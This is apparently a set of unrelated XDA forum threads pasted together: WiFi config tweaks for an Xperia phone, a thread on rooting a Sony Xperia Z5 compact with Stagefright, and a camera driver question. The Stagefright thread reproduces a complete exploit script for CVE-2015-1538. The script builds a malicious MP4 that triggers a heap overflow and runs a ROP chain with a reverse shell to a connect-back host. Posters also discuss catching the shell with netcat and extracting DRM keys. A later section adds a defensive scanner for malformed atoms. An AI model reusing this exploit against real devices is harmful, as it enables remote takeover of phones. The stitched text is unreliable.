WiFiAdhoc = 1
and
Code:
Single_Dual_Band_Solution = 0
to
Code:
Single_Dual_Band_Solution = 1
Reboot your phone. "
after changing it not just it still doesnt fix my wifi problems, its a huge battery drainer, so had to change the numbers back to the way it was
Oic,thanks for information,and my phone WiFi doesn't disconnect often
By the way,range,not rage lol
XDA Premium sent this message from owner of Sk17i
It works perfect! i tried it and increase my range now nearly always full wi fi range inside my house before this full only in my room
Thanks hope not so much battery drain
Izzy Stinson said:
when im in my room, my wifi signal is weak 1 bar. and of course near the where my router located my wifi signal is full bar.
i have done an experiment, both full and weak wifi signals, my wifi still gets disconnected when downloading big files, browsing market etc.
im not sure if its router or my phone wifi problems.
i will test it soon if i have time. but i doubt it will fix my problems though. because i have tried your method it is similar as from this thread
http://forum.xda-developers.com/showthread.php?t=1568792
" 9. Enabling WiFi Dual Band and Burst Mode
As the title already, this is to increase the internet speed for WiFi on your phone.
Personally, I didn't notice any difference in battery usage.
Open Root Explorer, go to \system\etc and open file named tiwlan.ini with Text Editor.
Edit these lines:
Code:
HT_Enable=0
BurstModeEnable = 0
WiFiAdhoc = 0
to
Code:
HT_Enable=1
BurstModeEnable = 1
WiFiAdhoc = 1
and
Code:
Single_Dual_Band_Solution = 0
to
Code:
Single_Dual_Band_Solution = 1
Reboot your phone. "
after changing it not just it still doesnt fix my wifi problems, its a huge battery drainer, so had to change the numbers back to the way it was
For me i saw that battery drain is the same
That thread is for gb only and mine for both gb and ics
Try connect a laptop or another device to ur router
If the problem still .. It will be router problem
Curtis7990 said:
It works perfect! i tried it and increase my range now nearly always full wi fi range inside my house before this full only in my room
Thanks hope not so much battery drain
Same with me :3
XDA Premium sent this message from owner of Sk17i
Curtis7990 said:
It works perfect! i tried it and increase my range now nearly always full wi fi range inside my house before this full only in my room
Thanks hope not so much battery drain
Welcome i'm really happy to hear that .. I have noticed to more battery drain ..
shinishi said:
For me i saw that battery drain is the same
That thread is for gb only and mine for both gb and ics
Try connect a laptop or another device to ur router
If the problem still .. It will be router problem
no wifi problems on my laptop or any laptop. just my phone xperia mini pro sk17i had this wifi problems :S
Izzy Stinson said:
no wifi problems on my laptop or any laptop. just my phone xperia mini pro sk17i had this wifi problems :S
do you have custom kernel or rom?
Using "Stagefright" exploit CVE-2015-1538 for rooting Sony Xperia Z5 compact?
Hello to the community!
I've seen a video on the Zimperium Stagefright Detector App page in the Google Play Store showing how you can get root access to an Android system. And that seems to be quite easy - just executing a Python script.
So my questions are:
- Is the Sony Xperia Z5 compact vulnerable using the CVE-2015-1538 exploit? (haven't tested yet on my Sony Xperia Z5 compact device)
- Is it then possible to root the Sony Xperia Z5 compact permanently by changing the necessary files in the system, maybe manually via telnet?
- Can this be done without unlocking the bootloader?
- Which files have to be changed and what are the changes to get permanent root Access?
Maybe this is a way to backup the TA partition to preserve DRM keys if rooting is not possible with this method. And after backing up rooting could be done by unlocking the bootloader and then applying the root methods described in other threads.
Regards from Dresden
"Klaus"
klausstoertebeker said:
- Is the Sony Xperia Z5 compact vulnerable using the CVE-2015-1538 exploit? (haven't tested yet on my Sony Xperia Z5 compact device)
Yes, according to Stagefright Detector. I could not get Stagefright to work on my Z5C, but that is probably due to my shortcomings.
klausstoertebeker said:
- Is it then possible to root the Sony Xperia Z5 compact permanently by changing the necessary files in the system, maybe manually via telnet?
Probably not. Stagefright will give you "media" or "system" privileges. These users can't remount the system partition to make it writable. Also, Sony has strengthened the security using a kernel module (Sony RIC) that disallows any user (even root) from remounting the system partition.
However, you could maybe (very unlikely) find a system writable executable file in ramdisk and hope for root to execute your modified file.
klausstoertebeker said:
- Can this be done without unlocking the bootloader?
Afaik, no one has succeeded yet.
klausstoertebeker said:
- Which files have to be changed and what are the changes to get permanent root Access?
Maybe this is a way to backup the TA partition to preserve DRM keys if rooting is not possible with this method. And after backing up rooting could be done by unlocking the bootloader and then applying the root methods described in other threads.
Permanent root on this device is rather tough to achieve. You can't modify system partition due to dm-verity (verified boot), and you can most likely not modify boot partition without unlocking the bootloader.
As you say, your best shot is to achieve temporary root by exploiting some kernel module/driver and then dump TA. This is of course not trivial.
There is maybe another way to get both root and DRM features. As system user (achieved using Stagefright), you can query the "tad" socket to retrieve the DRM keys. This is how Sony is reading the DRM keys when verifying things. When you have the DRM keys you can unlock BL, root, and then modify your ROM to spoof "tad" socket responses with your previously extracted keys. Unlikely, but possibly, you could even write the keys back to the TA partition.
This method requires system privileges. If some clever one helps me getting Stagefright working, I could probably extract the DRM keys.
Maybe the CVE-2015-3636 is easier to use?
Hi nilezon!
Due to the fact I'm on vacation I can't try to get the CVE-2015-1538 exploit working - my SONY Xperia Z5 compact is at home.
But I surfed the Internet and found another exploit that's maybe easier to be used to get root privileges: CVE-2015-3636
And if I get the document right, a non-privileged app could be used to get root privileges using a pointer use-after-free bug in the kernel. I'm not an app programmer (I just programmed aviation software parts for jet-propelled military planes), but it seems to me that the way described in the linked document is easier to go than the way to use the CVE-2015-1538 - I read on the internet that Sony currently is delivering a patch closing the Stagefright exploit.
To find out if my phone (SONY Xperia Z1 compact) and tablet are vulnerable to the CVE-2015-3636, I used the app VTS for Android.
If this is a walkable way and you could write an app, maybe the code for backing up the DRM keys or the whole TA Partition could be included into that app using the CVE-2015-3636 exploit to get even temporary root privileges...
What do you think?
Regards
"Klaus"
klausstoertebeker said:
...
AFAIK, the Z5 family is not vulnerable to the CVE-2015-3636 exploit.
Generating the CVE-1538-2015 mp4-file
Hi nilezon,
I was able to generate the CVE-1538-2015 file doing three modifications to the python code published by Joshua J. Drake:
Code:
#!/usr/bin/env python
# Joshua J. Drake (@jduck) of ZIMPERIUM zLabs
# Shout outs to our friends at Optiv (formerly Accuvant Labs)
# (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015
# www.zimperium.com
#
# Exploit for RCE Vulnerability CVE-2015-1538 #1
# Integer Overflow in the libstagefright MP4 'stsc' atom handling
#
# Don't forget, the output of "create_mp4" can be delivered many ways!
# MMS is the most dangerous attack vector, but not the only one...
#
# DISCLAIMER: This exploit is for testing and educational purposes only. Any
# other usage for this code is not allowed. Use at your own risk.
#
# "With great power comes great responsibility." - Uncle Ben
#
import struct
import socket
#
# Creates a single MP4 atom - LEN, TAG, DATA
#
def make_chunk(tag, data):
if len(tag) != 4:
raise 'Yo! They call it "FourCC" for a reason.'
ret = struct.pack('>L', len(data) + 8)
ret += tag
ret += data
return ret
#
# Make an 'stco' atom - Sample Table Chunk Offets
#
def make_stco(extra=''):
ret = struct.pack('>L', 0) # version
ret += struct.pack('>L', 0) # mNumChunkOffsets
return make_chunk('stco', ret+extra)
#
# Make an 'stsz' atom - Sample Table Size
#
def make_stsz(extra=''):
ret = struct.pack('>L', 0) # version
ret += struct.pack('>L', 0) # mDefaultSampleSize
ret += struct.pack('>L', 0) # mNumSampleSizes
return make_chunk('stsz', ret+extra)
#
# Make an 'stts' atom - Sample Table Time-to-Sample
#
def make_stts():
ret = struct.pack('>L', 0) # version
ret += struct.pack('>L', 0) # mTimeToSampleCount
return make_chunk('stts', ret)
#
# This creates a single Sample Table Sample-to-Chunk entry
#
def make_stsc_entry(start, per, desc):
ret = ''
ret += struct.pack('>L', start + 1)
ret += struct.pack('>L', per)
ret += struct.pack('>L', desc)
return ret
#
# Make an 'stsc' chunk - Sample Table Sample-to-Chunk
#
# If the caller desires, we will attempt to trigger (CVE-2015-1538 #1) and
# cause a heap overflow.
#
# def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = False):
def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = True):
ret = struct.pack('>L', 0) # version/flags
# this is the clean version...
if not do_overflow:
ret += struct.pack('>L', num_alloc) # mNumSampleToChunkOffsets
ret += 'Z' * (12 * num_alloc)
return make_chunk('stsc', ret)
# now the explicit version. (trigger the bug)
ret += struct.pack('>L', 0xc0000000 + num_alloc) # mNumSampleToChunkOffsets
# fill in the entries that will overflow the buffer
for x in range(0, num_write):
ret += make_stsc_entry(sp_addr, sp_addr, sp_addr)
ret = make_chunk('stsc', ret)
# patch the data_size
ret = struct.pack('>L', 8 + 8 + (num_alloc * 12)) + ret[4:]
return ret
#
# Build the ROP chain
#
# ROP pivot by Georg Wicherski! Thanks!
#
"""
(gdb) x/10i __dl_restore_core_regs
0xb0002850 <__dl_restore_core_regs>: add r1, r0, #52 ; 0x34
0xb0002854 <__dl_restore_core_regs+4>: ldm r1, {r3, r4, r5}
0xb0002858 <__dl_restore_core_regs+8>: push {r3, r4, r5}
0xb000285c <__dl_restore_core_regs+12>: ldm r0, {r0, r1, r2, r3, r4, r5, r6, r7, r8, r9, r10, r11}
0xb0002860 <__dl_restore_core_regs+16>: ldm sp, {sp, lr, pc}
"""
"""
b0001144 <__dl_mprotect>:
b0001144: e92d0090 push {r4, r7}
b0001148: e3a0707d mov r7, #125 ; 0x7d
b000114c: ef000000 svc 0x00000000
b0001150: e8bd0090 pop {r4, r7}
b0001154: e1b00000 movs r0, r0
b0001158: 512fff1e bxpl lr
b000115c: ea0015cc b b0006894 <__dl_raise+0x10>
"""
def build_rop(off, sp_addr, newpc_val, cb_host, cb_port):
rop = ''
rop += struct.pack('<L', sp_addr + off + 0x10) # new sp
rop += struct.pack('<L', 0xb0002a98) # new lr - pop {pc}
rop += struct.pack('<L', 0xb00038b2+1) # new pc: pop {r0, r1, r2, r3, r4, pc}
rop += struct.pack('<L', sp_addr & 0xfffff000) # new r0 - base address (page aligned)
rop += struct.pack('<L', 0x1000) # new r1 - length
rop += struct.pack('<L', 7) # new r2 - protection
rop += struct.pack('<L', 0xd000d003) # new r3 - scratch
rop += struct.pack('<L', 0xd000d004) # new r4 - scratch
rop += struct.pack('<L', 0xb0001144) # new pc - _dl_mprotect
native_start = sp_addr + 0x80
rop += struct.pack('<L', native_start) # address of native payload
#rop += struct.pack('<L', 0xfeedfed5) # top of stack...
# linux/armle/shell_reverse_tcp (modified to pass env and fork/exit)
buf = ''
# fork
buf += '\x02\x70\xa0\xe3'
buf += '\x00\x00\x00\xef'
# continue if not parent...
buf += '\x00\x00\x50\xe3'
buf += '\x02\x00\x00\x0a'
# exit parent
buf += '\x00\x00\xa0\xe3'
buf += '\x01\x70\xa0\xe3'
buf += '\x00\x00\x00\xef'
# setsid in child
buf += '\x42\x70\xa0\xe3'
buf += '\x00\x00\x00\xef'
# socket/connect/dup2/dup2/dup2
buf += '\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x05\x20\x81\xe2\x8c'
buf += '\x70\xa0\xe3\x8d\x70\x87\xe2\x00\x00\x00\xef\x00\x60'
buf += '\xa0\xe1\x6c\x10\x8f\xe2\x10\x20\xa0\xe3\x8d\x70\xa0'
buf += '\xe3\x8e\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1'
buf += '\x00\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x06'
buf += '\x00\xa0\xe1\x01\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00'
buf += '\x00\xef\x06\x00\xa0\xe1\x02\x10\xa0\xe3\x3f\x70\xa0'
buf += '\xe3\x00\x00\x00\xef'
# execve(shell, argv, env)
buf += '\x30\x00\x8f\xe2\x04\x40\x24\xe0'
buf += '\x10\x00\x2d\xe9\x38\x30\x8f\xe2\x08\x00\x2d\xe9\x0d'
buf += '\x20\xa0\xe1\x10\x00\x2d\xe9\x24\x40\x8f\xe2\x10\x00'
buf += '\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00'
buf += '\xef\x02\x00'
# Add the connect back host/port
buf += struct.pack('!H', cb_port)
cb_host = socket.inet_aton(cb_host)
buf += struct.pack('=4s', cb_host)
# shell -
buf += '/system/bin/sh\x00\x00'
# argv -
buf += 'sh\x00\x00'
# env -
buf += 'PATH=/sbin:/vendor/bin:/system/sbin:/system/bin:/system/xbin\x00'
# Add some identifiable stuff, just in case something goes awry...
rop_start_off = 0x34
x = rop_start_off + len(rop)
while len(rop) < 0x80 - rop_start_off:
rop += struct.pack('<L', 0xf0f00000+x)
x += 4
# Add the native payload...
rop += buf
return rop
#
# Build an mp4 that exploits CVE-2015-1538 #1
#
# We mimic meow.3gp here...
#
def create_mp4(sp_addr, newpc_val, cb_host, cb_port):
chunks = []
# Build the MP4 header...
ftyp = 'mp42'
ftyp += struct.pack('>L', 0)
ftyp += 'mp42'
ftyp += 'isom'
chunks.append(make_chunk('ftyp', ftyp))
# Note, this causes a few allocations...
moov_data = ''
moov_data += make_chunk('mvhd',
struct.pack('>LL', 0, 0x41414141) +
('B' * 0x5c) )
# Add a minimal, verified trak to satisfy mLastTrack being set
moov_data += make_chunk('trak',
make_chunk('stbl',
make_stsc(0x28, 0x28) +
make_stco() +
make_stsz() +
make_stts() ))
# Spray the heap using a large tx3g chunk (can contain binary data!)
"""
0x4007004e <_ZNK7android7RefBase9decStrongEPKv+2>: ldr r4, [r0, #4] ; load mRefs
0x40070050 <_ZNK7android7RefBase9decStrongEPKv+4>: mov r5, r0
0x40070052 <_ZNK7android7RefBase9decStrongEPKv+6>: mov r6, r1
0x40070054 <_ZNK7android7RefBase9decStrongEPKv+8>: mov r0, r4
0x40070056 <_ZNK7android7RefBase9decStrongEPKv+10>: blx 0x40069884 ; atomic_decrement
0x4007005a <_ZNK7android7RefBase9decStrongEPKv+14>: cmp r0, #1 ; must be 1
0x4007005c <_ZNK7android7RefBase9decStrongEPKv+16>: bne.n 0x40070076 <_ZNK7android7RefBase9decStrongEPKv+42>
0x4007005e <_ZNK7android7RefBase9decStrongEPKv+18>: ldr r0, [r4, #8] ; load refs->mBase
0x40070060 <_ZNK7android7RefBase9decStrongEPKv+20>: ldr r1, [r0, #0] ; load mBase._vptr
0x40070062 <_ZNK7android7RefBase9decStrongEPKv+22>: ldr r2, [r1, #12] ; load method address
0x40070064 <_ZNK7android7RefBase9decStrongEPKv+24>: mov r1, r6
0x40070066 <_ZNK7android7RefBase9decStrongEPKv+26>: blx r2 ; call it!
"""
page = ''
off = 0 # the offset to the next object
off += 8
page += struct.pack('<L', sp_addr + 8 + 16 + 8 + 12 - 28) # _vptr.RefBase (for when we smash mDataSource)
page += struct.pack('<L', sp_addr + off) # mRefs
off += 16
page += struct.pack('<L', 1) # mStrong
page += struct.pack('<L', 0xc0dedbad) # mWeak
page += struct.pack('<L', sp_addr + off) # mBase
page += struct.pack('<L', 16) # mFlags (dont set OBJECT_LIFETIME_MASK)
off += 8
page += struct.pack('<L', sp_addr + off) # the mBase _vptr.RefBase
page += struct.pack('<L', 0xf00dbabe) # mBase.mRefs (unused)
off += 16
page += struct.pack('<L', 0xc0de0000 + 0x00) # vtable entry 0
page += struct.pack('<L', 0xc0de0000 + 0x04) # vtable entry 4
page += struct.pack('<L', 0xc0de0000 + 0x08) # vtable entry 8
page += struct.pack('<L', newpc_val) # vtable entry 12
rop = build_rop(off, sp_addr, newpc_val, cb_host, cb_port)
x = len(page)
while len(page) < 4096:
page += struct.pack('<L', 0xf0f00000+x)
x += 4
off = 0x34
page = page[:off] + rop + page[off+len(rop):]
spray = page * (((2*1024*1024) / len(page)) - 20)
moov_data += make_chunk('tx3g', spray)
block = 'A' * 0x1c
bigger = 'B' * 0x40
udta = make_chunk('udta',
make_chunk('meta',
struct.pack('>L', 0) +
make_chunk('ilst',
make_chunk('cpil', make_chunk('data', struct.pack('>LL', 21, 0) + 'A')) +
make_chunk('trkn', make_chunk('data', struct.pack('>LL', 0, 0) + 'AAAABBBB')) +
make_chunk('disk', make_chunk('data', struct.pack('>LL', 0, 0) + 'AAAABB')) +
make_chunk('covr', make_chunk('data', struct.pack('>LL', 0, 0) + block)) * 32 +
make_chunk('\xa9alb', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9ART', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('aART', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9day', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9nam', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9wrt', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('gnre', make_chunk('data', struct.pack('>LL', 1, 0) + block)) +
make_chunk('covr', make_chunk('data', struct.pack('>LL', 0, 0) + block)) * 32 +
make_chunk('\xa9ART', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)) +
make_chunk('\xa9wrt', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)) +
make_chunk('\xa9day', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)))
)
)
moov_data += udta
# Make the nasty trak
tkhd1 = ''.join([
'\x00', # version
'D' * 3, # padding
'E' * (5*4), # {c,m}time, id, ??, duration
'F' * 0x10, # ??
struct.pack('>LLLLLL',
0x10000, # a00
0, # a01
0, # dx
0, # a10
0x10000, # a11
0), # dy
'G' * 0x14
])
trak1 = ''
trak1 += make_chunk('tkhd', tkhd1)
mdhd1 = ''.join([
'\x00', # version
'D' * 0x17, # padding
])
mdia1 = ''
mdia1 += make_chunk('mdhd', mdhd1)
mdia1 += make_chunk('hdlr', 'F' * 0x3a)
dinf1 = ''
dinf1 += make_chunk('dref', 'H' * 0x14)
minf1 = ''
minf1 += make_chunk('smhd', 'G' * 0x08)
minf1 += make_chunk('dinf', dinf1)
# Build the nasty sample table to trigger the vulnerability here.
stbl1 = make_stsc(3, (0x1200 / 0xc) - 1, sp_addr, True) # TRIGGER
# Add the stbl to the minf chunk
minf1 += make_chunk('stbl', stbl1)
# Add the minf to the mdia chunk
mdia1 += make_chunk('minf', minf1)
# Add the mdia to the track
trak1 += make_chunk('mdia', mdia1)
# Add the nasty track to the moov data
moov_data += make_chunk('trak', trak1)
# Finalize the moov chunk
moov = make_chunk('moov', moov_data)
chunks.append(moov)
# Combine outer chunks together and voila.
data = ''.join(chunks)
return data
if __name__ == '__main__':
import sys
# import mp4
import argparse
def write_file(path, content):
with open(path, 'wb') as f:
f.write(content)
def addr(sval):
if sval.startswith('0x'):
return int(sval, 16)
return int(sval)
# The address of a fake StrongPointer object (sprayed)
sp_addr = 0x41d00010 # takju @ imm76i - 2MB (via hangouts)
# The address to of our ROP pivot
newpc_val = 0xb0002850 # point sp at __dl_restore_core_regs
# Allow the user to override parameters
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--connectback-host', dest='cbhost', default='31.3.3.7')
parser.add_argument('-p', '--connectback-port', dest='cbport', type=int, default=12345)
parser.add_argument('-s', '--spray-address', dest='spray_addr', type=addr, default=None)
parser.add_argument('-r', '--rop-pivot', dest='rop_pivot', type=addr, default=None)
parser.add_argument('-o', '--output-file', dest='output_file', default='cve-2015-1538-1.mp4')
args = parser.parse_args()
if len(sys.argv) == 1:
parser.print_help()
sys.exit(-1)
if args.spray_addr == None:
args.spray_addr = sp_addr
if args.rop_pivot == None:
args.rop_pivot = newpc_val
# Build the MP4 file...
# data = mp4.create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)
data = create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)
print('[*] Saving crafted MP4 to %s ...' % args.output_file)
write_file(args.output_file, data)
(Modifications are: changing line 77 from "def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = False)" to "def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = True)" to achieve using the exploit, commenting out "import mp4" in line 353 to avoid compiler errors and changing line 390 from "data = mp4.create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)" to "data = create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)" to avoid compiler errors.)
To run the code I used the "Wing IDE" in combination with "Python 2.7.3". I used the -c <reconnect-IP-address> and -p <reconnect-port> arguments.
But I can't get reconnected from my Sony Xperia Z5 compact because I don't know how to backlisten to the phone and switch to a shell. Maybe the computer in the Zimperium video shows a Linux machine and I'm just running a Windows 7 machine.
But maybe it helps you on the way to save the DRM keys.
(By the way: In the video the "id" command after the first change of directory shows "uid=0(root)" and "gid=0(root)", which means to me that the user has root privileges. Or am I wrong?)
"Klaus"
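The script in the post above sets the `stsc` entry count to `0xc0000000 + num_alloc` while declaring an atom only large enough for `num_alloc` 12-byte entries. As an added example (not part of the original post or of Zimperium's code), this Python 3 scanner walks an MP4's atoms and flags any `stsc` whose declared count cannot fit in the atom; the helper names and the constructed sample files are assumptions for the illustration, as is the reading that the overflow comes from a 32-bit multiplication of the count by the entry size.

```python
import struct

STSC_ENTRY_SIZE = 12  # first_chunk, samples_per_chunk, sample_description_index
CONTAINERS = {b"moov", b"trak", b"mdia", b"minf", b"stbl"}  # path down to stsc


def iter_atoms(buf, start, end):
    """Yield (tag, atom_offset, payload_start, payload_end) for atoms in buf[start:end]."""
    pos = start
    while pos + 8 <= end:
        size, tag = struct.unpack_from(">L4s", buf, pos)
        header = 8
        if size == 1:  # 64-bit "largesize" follows the tag
            if pos + 16 > end:
                return
            size = struct.unpack_from(">Q", buf, pos + 8)[0]
            header = 16
        elif size == 0:  # atom extends to the end of its parent
            size = end - pos
        if size < header or pos + size > end:
            return  # truncated or corrupt length: stop walking this level
        yield tag, pos, pos + header, pos + size
        pos += size


def check_stsc(buf, atom_offset, start, end):
    """Return a finding if the declared entry count cannot fit in the atom, else None."""
    if end - start < 8:
        return {"offset": atom_offset, "reason": "stsc shorter than its 8-byte header"}
    count = struct.unpack_from(">L", buf, start + 4)[0]  # follows version/flags
    needed = count * STSC_ENTRY_SIZE  # exact value: Python ints do not wrap
    available = end - start - 8
    if needed <= available:
        return None
    return {
        "offset": atom_offset,
        "reason": "stsc entry count exceeds atom size",
        "entry_count": count,
        "bytes_needed": needed,
        "bytes_available": available,
        # What a 32-bit multiplication would yield instead of bytes_needed.
        "wrapped_32bit": needed & 0xFFFFFFFF,
    }


def scan_mp4(buf):
    """Walk the container atoms and collect a finding for every suspicious stsc."""
    findings = []
    pending = [(0, len(buf))]
    while pending:
        start, end = pending.pop()
        for tag, atom_offset, p_start, p_end in iter_atoms(buf, start, end):
            if tag in CONTAINERS:
                pending.append((p_start, p_end))
            elif tag == b"stsc":
                finding = check_stsc(buf, atom_offset, p_start, p_end)
                if finding:
                    findings.append(finding)
    return findings


# --- Constructed sample input (not taken from any real file) ---
def atom(tag, payload):
    return struct.pack(">L4s", len(payload) + 8, tag) + payload


def sample_file(entry_count, entries_present):
    """Minimal ftyp + moov/trak/mdia/minf/stbl/stsc skeleton with zeroed entries."""
    nested = atom(b"stsc", struct.pack(">LL", 0, entry_count)
                  + b"\x00" * (STSC_ENTRY_SIZE * entries_present))
    for tag in (b"stbl", b"minf", b"mdia", b"trak", b"moov"):
        nested = atom(tag, nested)
    return atom(b"ftyp", b"isom" + struct.pack(">L", 0) + b"isom") + nested


CLEAN = sample_file(2, 2)             # count matches the entries present
SUSPECT = sample_file(0xC0000003, 3)  # huge count, room for only 3 entries

if __name__ == "__main__":
    for name, data in (("clean", CLEAN), ("suspect", SUSPECT)):
        print(name, scan_mp4(data))
```

For the suspect sample the 32-bit wrapped size equals the 36 bytes actually present, which is why a size check done after a wrapping multiplication would pass.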
But the Z3+ old firmware is vulnerable. Maybe you can use a Z3+ system folder on the Z5! They are quite the same!
Sent from my E6533 using XDA Free mobile app
Good job on modifying the script. I could run it on my linux box without any modifications and it produced an MP4. I then moved it over to my Z5C and launched it. After that I tried a reverse shell (netcat -l -p <port>) but got nothing. Then I went out on the interwebs to investigate and here are a couple of pointers.
1. The code is written to exploit the hangouts app specifically. So running the mp4 with any other player isn't going to work.
2. The code is written to take default values if -s and -r are not given to the scripts as arguments. The default values are said to only work on the Nexus device that it was written for.
3. The video you saw was edited to make it look really simple, or another script was run that they didn't show us.
More information can be found in the comments around here:
http://null-byte.wonderhowto.com/forum/stagefright-exploit-released-0164432/
Happy exploiting, Merry Christmas.
~Aeny
Hey @klausstoertebeker I have an unrooted stock Sony Z5 Compact that can be used for exploit testing. Wanted to offer it for this purpose before rooting it. If having someone volunteer their "unrooted, bootloader never unlocked" phone as a test device is helpful then let me know.
Otherwise I'm going to root my new phone soon.
Keep up the good work!
Using "Stagefright" exploit CVE-2015-1538 for rooting Sony Xperia Z5 compact?
Hello Joeisgood99!
Thanks for your offer, but I'm not a programmer who takes part in rooting the Z5 compact actively 'cause I'm not experienced with Android programming at all. But I tried to give a thought how a root to this excellent mobile phone could be achieved.
For me using this exploit has become obsolete 'cause I accidentally did a system update where all the Stagefright exploits are closed...
Regards
"Klaus"
You can downgrade your phone using the flashtools to a previous Android version. Don't give up!!!!
Sent from my E6533 using XDA Free mobile app
Maybe downgrade,...
... but to flash firmware you have to unlock the bootloader. And when unlocking the bootloader, you'll lose your DRM keys.
And the intention of most "rooting" forums is to find a way of rooting the mobile phone without unlocking the bootloader to keep the DRM keys.
And, by the way, if you're unlocking your bootloader you can install a pre-rooted ROM instead of downloading stock ROMs.
You don't need to unlock bootloader to flash an official firmware.
klausstoertebeker said:
... but to flash firmware you have to unlock the bootloader. And when unlocking the bootloader, you'll lose your DRM keys.
And the intention of most "rooting" forums is to find a way of rooting the mobile phone without unlocking the bootloader to keep the DRM keys.
And, by the way, if you're unlocking your bootloader you can install a pre-rooted ROM instead of downloading stock ROMs.
You can flash FTFs without any need of unlocking a bootloader. And while you're at it: use 32.0.A.4.11. Literally everything except CVE-2015-3876 is vulnerable. I just bought a Z5, and am looking forward to putting some effort into messing with Stagefright rooting.
I'm having a Z5 E6653 BTW
Sorry,...
... Myself5!
You're right in saying that FTFs can be flashed without unlocking the bootloader. But nevertheless I won't downgrade again at the moment.
The reason for me to root my Z5 compact is that I'd like to install Xposed in combination with XPrivacy for security reasons. I want to control the access of apps to my personal data (contacts, calendar, location, etc). But now I found two apps which fulfil my security needs without root privileges:
MoboClean, which is released as a working app
SRT AppGuard, which is in the beta stage
I prefer the second solution, but at the moment it is still under development. I used it with KitKat and JellyBean and it was really good. And until it is released as a "productive" app I'll use MoboClean.
And the second reason for rooting my Z5 compact was that I want to uninstall those Google apps (and other pre-installed bloatware) which collect my data and "phone home" without my notice. And this can be done without rooting now on the Z5 compact via "Preferences -> Apps", selecting "Deactivate" in the appropriate app tab.
There are a number of Stagefright vulnerabilities in some of the stock firmware releases downloadable on Xperifirm. I have made screenshots and posted them on this thread.
http://forum.xda-developers.com/showpost.php?p=64618471&postcount=93
Pardon me, but I was just thinking..
https://www.nccgroup.trust/globalas...pers/2016/01/libstagefright-exploit-notespdf/
Here there are some steps/tips on how to deal with SELinux policy in order to use Stagefright exploits successfully. Expert-oriented information.
@zxz0O0 sorry to disturb you, I don't know if you already know those things but I thought it's worth a check.
Hi all,
I am trying to enable the ov9734 sensor on an IMX8 board in 64 bits (Compulab board). I re-used an existing driver (ov5640) and just modified the registers and driver ID.
I also modified the device tree.
My driver is found by the kernel, with no problem during probe.
But when I run the "v4l2-ctl --all" command, the pixel format is null (or empty):
Code:
[email protected]:~# v4l2-ctl --all
Driver Info (not using libv4l2):
Driver name : mx6s-csi
Card type : i.MX6S_CSI
Bus info : platform:30a90000.csi1_bridge
Driver version: 4.9.51
Capabilities : 0x84200001
Video Capture
Streaming
Extended Pix Format
Device Capabilities
Device Caps : 0x04200001
Video Capture
Streaming
Extended Pix Format
Priority: 0
Video input : 0 (Camera: ok)
Format Video Capture:
Width/Height : 640/480
Pixel Format : ''
Field : None
Bytes per Line : 0
Size Image : 307200
Colorspace : Default
Transfer Function : Default
YCbCr Encoding : Default
Quantization : Default
And another problem (the same problem?): when I want to start streaming, I get nothing (no data sent by MIPI):
Code:
Input #0, video4linux2,v4l2, from '/dev/video0':
Duration: N/A, bitrate: 147456 kb/s
Stream #0:0: Video: rawvideo (YUY2 / 0x32595559), yuyv422, 640x480, 147456 kb/s, 30 fps, 30 tbr, 1000k tbn, 1000k tbc
[swscaler @ 0x4706ad0] deprecated pixel format used, make sure you did set range correctly
[image2 @ 0x46fe2b0] Using AVStream.codec to pass codec parameters to muxers is deprecated, use AVStream.codecpar instead.
Output #0, image2, to './out.jpg':
Metadata:
encoder : Lavf57.41.100
Stream #0:0: Video: mjpeg, yuvj422p(pc), 640x480, q=2-31, 200 kb/s, 30 fps, 30 tbn, 30 tbc
Metadata:
encoder : Lavc57.48.101 mjpeg
Side data:
cpb: bitrate max/min/avg: 0/0/200000 buffer size: 0 vbv_delay: -1
Stream mapping:
Stream #0:0 -> #0:0 (rawvideo (native) -> mjpeg (native))
Press [q] to stop, [?] for help
frame= 0 fps=0.0 q=0.0 Lsize=N/A time=00:00:00.00 bitrate=N/A speed= 0x
video:0kB audio:0kB subtitle:0kB other streams:0kB global headers:0kB muxing overhead: unknown
Output file is empty, nothing was encoded (check -ss / -t / -frames parameters if used)
Can somebody help me?
Michaël